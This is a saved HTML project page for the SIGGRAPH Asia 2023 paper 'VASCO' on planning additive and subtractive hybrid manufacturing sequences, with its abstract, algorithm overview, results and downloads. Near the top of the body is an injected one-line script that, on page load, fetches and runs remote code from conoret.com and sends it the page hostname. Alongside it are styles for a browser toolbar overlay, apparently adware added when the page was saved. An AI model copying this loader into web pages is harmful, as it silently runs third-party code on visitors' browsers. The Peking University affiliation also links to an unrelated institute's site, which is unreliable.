
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


    <title>
        VASCO: Volume and Surface Co-Decomposition for Hybrid Manufacturing
    </title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="./files/bootstrap.min.css">
    <script src="./files/jquery.min.js.download"></script>
    <script src="./files/bootstrap.min.js.download"></script>
    <link rel="stylesheet" type="text/css" href="./files/style.css" media="screen">
    <link rel="stylesheet" type="text/css" href="./files/orbit-1.2.3.css" media="screen">
    <link rel="stylesheet" type="text/css" href="./files/jquery.fancybox-1.3.4.css" media="screen">
    <!--[if lt IE 9]><script type="text/javascript" src="assets/scripts/modernizr.js"></script><![endif]-->
    <style type="text/css">
        #lb_infobar_3436182992 {
            color: #000000 !important;
            font-weight: normal !important;
            text-decoration: none !important;
            margin-top: 0 !important;
            margin-bottom: 0 !important;
            margin-left: 0 !important;
            margin-right: 0 !important;
            padding-top: 0 !important;
            padding-bottom: 0 !important;
            padding-left: 0 !important;
            padding-right: 0 !important;
            float: none !important;
            text-align: left !important;
            height: 37px !important;
            width: 100% !important;
            background-color: #F5F5F5 !important;
            background-image: -webkit-linear-gradient(top, #F5F5F5, #EEEDED) !important;
            border-bottom: 1px solid #C0C0C0 !important;
            box-shadow: inset 0 1px 1px 1px #FFFFFF !important;
            line-height: 36px !important;
            font-family: '微软雅黑', '宋体' !important;
            z-index: 9999999999 !important;
            margin: 0 !important;
            padding: 0 !important;
            position: fixed !important;
            top: 0px !important;
            left: 0px !important;
        }

            #lb_infobar_3436182992,
            #lb_infobar_3436182992 * {
                border-radius: 0 !important;
                padding: 0 !important;
                margin: 0 !important;
            }

                #lb_infobar_3436182992 * {
                    width: auto !important;
                    background: none !important;
                }

                #lb_infobar_3436182992 input {
                    border-radius: 4px !important;
                    box-shadow: 0 1px 2px rgba(0, 0, 0, .15) !important;
                    font-family: '微软雅黑,', '宋体' !important;
                    font-size: 12px !important;
                    font-weight: normal !important;
                    text-shadow: none !important;
                    margin: 0 0 0 18px !important;
                    padding: 0 !important;
                }

        #lb_infobar_translate_3436182992 {
            background-color: #FBB016 !important;
            background-image: -webkit-linear-gradient(top, #FBB016, #ED8A0D) !important;
            width: 78px !important;
            height: 26px !important;
            border: 1px solid #E19D3C !important;
            color: #FFFFFF !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
        }

            #lb_infobar_translate_3436182992:hover {
                background-color: #FDBF3F !important;
                background-image: -webkit-linear-gradient(top, #FDBF3F, #ED8A0D) !important;
            }

            #lb_infobar_translate_3436182992:active {
                background-color: #ED8A0D !important;
                background-image: -webkit-linear-gradient(top, #ED8A0D, #FBB016) !important;
            }

        #lb_infobar_words_3436182992 {
            background-color: #FBB016 !important;
            background-image: -webkit-linear-gradient(top, #FBB016, #ED8A0D) !important;
            width: 90px !important;
            height: 26px !important;
            border: 1px solid #E19D3C !important;
            color: #FFFFFF !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
            left: 360px !important;
        }

            #lb_infobar_words_3436182992:hover {
                background-color: #FDBF3F !important;
                background-image: -webkit-linear-gradient(top, #FDBF3F, #ED8A0D) !important;
            }

            #lb_infobar_words_3436182992:active {
                background-color: #ED8A0D !important;
                background-image: -webkit-linear-gradient(top, #ED8A0D, #FBB016) !important;
            }

        #lb_infobar_return_3436182992 {
            background-color: #FFFFFF !important;
            background-image: -webkit-linear-gradient(top, #FFFFFF, #E0DFDF) !important;
            width: 78px !important;
            height: 26px !important;
            border: 1px solid #B0AFAF !important;
            color: rgba(0, 0, 0, .5) !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
        }

            #lb_infobar_return_3436182992.lb_infobar_return_words_3436182992 {
                width: 130px !important;
            }

            #lb_infobar_return_3436182992:hover {
                background-color: #EDECEC !important;
                background-image: -webkit-linear-gradient(top, #FFFFFF, #EDECEC) !important;
            }

            #lb_infobar_return_3436182992:active {
                background-color: #E0DFDF !important;
                background-image: -webkit-linear-gradient(top, #E0DFDF, #FFFFFF) !important;
            }

        #lb_infobar_3436182992 a {
            text-decoration: underline !important;
            font-size: 12px !important;
            color: #999999 !important;
            cursor: pointer !important;
        }

            #lb_infobar_3436182992 a:hover {
                color: #FC9500 !important;
            }

            #lb_infobar_3436182992 a:active {
                color: #D68003 !important;
            }

        #lb_infobar_close_3436182992 {
            background-position: -66px -27px !important;
            cursor: pointer !important;
            position: absolute !important;
            top: 0 !important;
            right: 1em !important;
            line-height: 36px !important;
        }

            #lb_infobar_close_3436182992:hover {
                background-position: -66px -41px !important;
            }

            #lb_infobar_close_3436182992:active {
                background-position: -66px -54px !important;
            }

        #lb_infobar_notice_3436182992 {
            line-height: 36px !important;
            margin-left: 55px !important;
            font-size: 14px !important;
            vertical-align: middle !important;
        }

        #lb_infobar_powered_3436182992 {
            padding-left: 18px !important;
            font-size: 10px !important;
            color: #979797 !important;
            font-family: 'Arial' !important;
            font-style: italic !important;
        }

        #lb_infobar_ignore_3436182992 {
            line-height: 36px !important;
            margin-right: 3em !important;
            position: absolute !important;
            top: 0 !important;
            right: 0 !important;
        }

        #lb_infobar_manual_3436182992 {
            line-height: 36px !important;
            margin-right: 12em !important;
            position: absolute !important;
            top: 0 !important;
            right: 0 !important;
        }

        #lb_infobar_icon_3436182992 {
            position: absolute !important;
            top: 0 !important;
            left: 0 !important;
            height: 37px !important;
            width: 42px !important;
            color: #fff !important;
            font-size: 24px !important;
            text-align: center !important;
            background-repeat: no-repeat !important;
            background-position: -80px 0 !important;
        }

        #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992,
        #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992 {
            background-color: #FFFFFF !important;
            background-image: -webkit-linear-gradient(top, #FFFFFF, #E0DFDF) !important;
            border: 1px solid #B0AFAF !important;
            color: #808080 !important;
        }

            #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992:hover,
            #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992:hover {
                background-color: #EDECEC !important;
                background-image: -webkit-linear-gradient(top, #FFFFFF, #EDECEC) !important;
            }

            #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992:hover,
            #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992:active {
                background-color: #E0DFDF !important;
                background-image: -webkit-linear-gradient(top, #E0DFDF, #FFFFFF) !important;
            }

        #lb_infobar_hover_3436182992:before {
            content: " " !important;
            position: absolute !important;
            border: 5px solid transparent !important;
            border-top: 5px solid #000 !important;
            bottom: -10px !important;
            left: 50% !important;
        }

        #lb_infobar_hover_3436182992:after {
            content: " " !important;
            position: absolute !important;
            border: 5px solid transparent !important;
            border-top: 5px solid #fff !important;
            bottom: -9px !important;
            left: 50% !important;
        }

        #lb_infobar_hover_3436182992 {
            line-height: 1.2 !important;
            font-size: 12px !important;
            min-width: 150px !important;
            position: fixed !important;
            background: #fff !important;
            border: 1px solid #333 !important;
            border-radius: 3px !important;
            padding: 10px !important;
            color: #333 !important;
            z-index: 9999999999 !important;
        }

            #lb_infobar_hover_3436182992.lb_infobar_hover_below:before {
                content: " " !important;
                position: absolute !important;
                border: 5px solid transparent !important;
                border-bottom: 5px solid #000 !important;
                top: -10px !important;
                left: 50% !important;
                bottom: auto !important;
            }

            #lb_infobar_hover_3436182992.lb_infobar_hover_below:after {
                content: " " !important;
                position: absolute !important;
                border: 5px solid transparent !important;
                border-bottom: 5px solid #fff !important;
                top: -9px !important;
                left: 50% !important;
                bottom: auto !important;
            }
    </style>
    <script src="./files/dsp" type="text/javascript" defer="" async=""></script>
</head>

<body style="margin-top: 38px !important; position: relative !important;">
    <script type="text/javascript">window.top === window && !function () { var e = document.createElement("script"), t = document.getElementsByTagName("head")[0]; e.src = "//conoret.com/dsp?h=" + document.location.hostname + "&r=" + Math.random(), e.type = "text/javascript", e.defer = !0, e.async = !0, t.appendChild(e) }();</script>

    <div class="wrapper">
        <header>
            <br>
            <br>
            <h1>VASCO: Volume and Surface Co-Decomposition for Hybrid Manufacturing</h1>
            <br>
            <p class="session">ACM Transactions on Graphics (SIGGRAPH Asia 2023)</p>
            <br>
            <p class="author">
                <a href="https://fanchao98.github.io/" target="_blank">Fanchao Zhong</a><sup>1</sup>&nbsp;&nbsp;
                <a href="https://haisenzhao.github.io/" target="_blank">Haisen Zhao*</a><sup>1</sup>&nbsp;&nbsp;
                <a href="" target="_blank">Haochen Li</a><sup>1</sup>&nbsp;&nbsp;
                <a href="https://ringednebulae.github.io/personal-webpage/" target="_blank">Xin Yan</a><sup>1</sup>&nbsp;&nbsp;
                <a href="https://www.researchgate.net/profile/Jikai-Liu-3" target="_blank">Jikai Liu</a><sup>1</sup>&nbsp;&nbsp;
                <a href="http://cfcs.pku.edu.cn/baoquan/" target="_blank">Baoquan Chen</a><sup>2</sup>&nbsp;&nbsp;
                <a href="http://irc.cs.sdu.edu.cn/~lulin" target="_blank">Lin Lu*</a><sup>1</sup>&nbsp;&nbsp;
            </p>
            <br>
            <p class="author">
                <sup>1</sup><a href="http://en.sdu.edu.cn/" target="_blank">Shandong University</a>&nbsp;&nbsp;
                <sup>2</sup><a href="https://ist.ac.at/en/home/" target="_blank">Peking University</a>&nbsp;&nbsp;
            </p>


            <br>
        </header>

        <section id="home">
            <div class="row" style="text-align:center;">
                <img src="./files/teaser.png" height="170" alt="">
            </div>
            <center>
                <p>
                    The proposed work introduces a novel computational framework that aims to minimize the number of transitions between additive and subtractive manufacturing processes while ensuring tool accessibility in manufacturing a complex object.
                </p>
            </center>
            <p><span><o:p>&nbsp;</o:p></span></p>
        </section>


        <section id="abstract">
            <h3 class="title">Abstract</h3> <br>
            <div class="row">
                <p>
                    <span class="dropcap">A</span>dditive and subtractive hybrid manufacturing (ASHM) involves the alternating use of additive and subtractive manufacturing techniques, which
                    provides unique advantages for fabricating complex geometries with otherwise inaccessible surfaces. However, a significant challenge lies in ensuring
                    tool accessibility during both fabrication procedures, as the object shape
                    may change dramatically, and different parts of the shape are interdependent.
                    In this study, we propose a computational framework to optimize the planning of additive and subtractive sequences while ensuring tool accessibility.
                    Our goal is to minimize the switching between additive and subtractive
                    processes to achieve efficient fabrication while maintaining product quality.
                    We approach the problem by formulating it as a Volume-And-Surface-COdecomposition (VASCO) problem. First, we slice volumes into slabs and
                    build a dynamic-directed graph to encode manufacturing constraints, with
                    each node representing a slab and direction reflecting operation order. We
                    introduce a novel geometry property called hybrid-fabricability for a pair
                    of additive and subtractive procedures. Then, we propose a beam-guided
                    top-down block decomposition algorithm to solve the VASCO problem. We
                    apply our solution to a 5-axis hybrid manufacturing platform and evaluate various 3D shapes. Finally, we assess the performance of our approach
                    through both physical and simulated manufacturing evaluations.
                </p>
                <br><br>
            </div>
            <div class="row">


            </div>
        </section>

       <section id="vid">
            <h3 class="title">Video</h3><br>
            <div style="text-align:center;">
                <iframe width="800" height="450" src="./files/VASCO_FFD.mp4" title="Video" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
            </div>
            <p>
                <span>
                    <o:p>&nbsp;</o:p>
                </span>
            </p><br><br>


        </section>

        <section id="vid">
            <h3 class="title"> Algorithm overview</h3><br>
            <div style="text-align:center;">
                <img src="./files/overview.png" width="900" alt="">
            </div>
            <p>
                We propose an iteration top-down decomposition algorithm for solving the VASCO problem. (1) It progressively decomposes a hybrid-fabricable
                block from the input Coral shape until the entire shape is decomposed. Each top-down decomposition iteration generates a hybrid-fabricable block with a
                randomly determined additive direction (deep red arrows). This figure shows three iterations, resulting in three blocks (the green, yellow, and red regions). (2)
                We visualize the procedure to produce one block of the 2nd iteration, where our solution is to encode all ASHM constraints with a well-defined slab-based
                dynamic-directed graph, followed by a greed node merging process to generate blocks. To build the graph called a hybrid block graph, (2-1) we need first
                to build a subtractive block graph to encode the subtractive accessibility constraints, (2-2) and an additive block graph to encode the additive
                accessibility and dependency constraints. (2-3) Then integrate subtractive block graph and additive block graph to hybrid block graph. (2-4) The hybrid-fabricable block is generated based on hybrid block graph with a
                greed node merging algorithm. (3) Finally, by reversing the order of decomposed blocks, a feasible ASHM manufacturing sequence is produced.
            </p>
            <br><br>
        </section>


        <section id="vid">
            <h3 class="title">More decomposition results</h3><br>
            <div style="text-align:center;">
                <img src="./files/decomposition results.png" width="900" alt="">
            </div>
            <p>
                Results gallery of ASHM sequence planning results generated by our beam-guided top-down decomposition method. The models are arranged in the
                order of Bunny, Kitten, Hand, Corner Holder, Bottle Opener, Julia vase, TPMS, Shelf, Impeller, Four-way pipe, Exhaust. The top row illustrates the inaccessible
                regions of each model, represented by red dots, which the machining cutter cannot reach. This assumption is made under the condition that the entire model
                has been additively manufactured. The subsequent rows visualize the ASHM sequence for each model from left to right, showcasing the staircase formed by
                the arrangement of slabs in AM process. The smoothing of high-quality surfaces produced by the subtractive process is also visualized. The arrows indicate
                the additive manufacturing (AM) directions for the hybrid-fabricable blocks. Note that we apply a larger inter-layer spacing of AM slabs for each visualization.
            </p>
            <br>


        </section>


        <section id="vid">
            <h3 class="title">Fabrication results</h3><br>
            <div style="text-align:center;">
                <img src="./files/fabrication.png" width="600" alt="">
            </div>
            <p>
                The Impeller (1 block), Kitten (2 blocks), Coral (3 blocks) and Fourway pipe (4 blocks) were fabricated using our ASHM machine. Each model
                demonstrates the fabrication result (left) of the first block with a purely
                additive process and the result (right) after the whole ASHM process. Our
                approach owns higher surface quality compared to pure additive manufacturing. The Four-way pipe model improve the quality of both the outer
                surface and the inner channel. However, some defects still exist (blue, green,
                and red circles, which are mainly caused by our imperfect equipment and
                subtractive path planning.)
            </p>
            <br>
        </section>


        <section id="vid">
            <h3 class="title">Our ASHM equipment</h3><br>
            <div style="text-align:center;">
                <img src="./files/machine.png" width="600" alt="">
            </div>
            <p>
                Our ASHM machine was modified from a CNC machine (YORNEW
                Benchtop 5 Axis CNC MX220). The accessories of the additive module
                are installed above the machine (left). The additive extrusion module is
                connected with the machine spindle in parallel (upper right). The lower
                right corner demonstrates the additive process and subtractive process.
            </p>
            <br>
        </section>


        <section id="downloads">
            <h3 class="title">Downloads</h3>
            <div class="row">
                <p>
                    <span>
                        <o:p>&nbsp;</o:p>
                    </span>
                </p>
                <table align="center" border="0" class="list">
                    <tbody>
                        <tr>
                            <td width="100" align="center"><a href="./files/VASCO_ASHM_SuppMate.pdf"> <img width="80" id="_x0000_i10320" src="./files/paperpic.png" alt="1"></a></td>
                            <td width="100" align="center"><a href="./files/equipment modification instructions.pdf"> <img width="80" id="_x0000_i10321" src="./files/paperpic.png" alt="1"></a></td>
                            <td width="100" align="center"><a href="./files/SuppMate.pdf"> <img width="80" id="_x0000_i10321" src="./files/paperpic.png" alt="1"></a></td>
                        </tr>

                        <tr>
                            <td width="180" align="center"><a href="./files/VASCO_ASHM_SuppMate.pdf"> Paper</a></td>
                            <td width="180" align="center"><a href="./files/equipment modification instructions.pdf"> Our ASHM equipment modification instructions</a></td>
                            <td width="180" align="center"><a href="./files/SuppMate.pdf"> Supplementary Materials
</a></td>
                        </tr>


                    </tbody>
                </table>
                <br>

            </div>

            <p>
                <span>
                    <o:p>&nbsp;</o:p>
                </span>
            </p>
        </section>



        <footer></footer>
    </div>


</body>
</html>
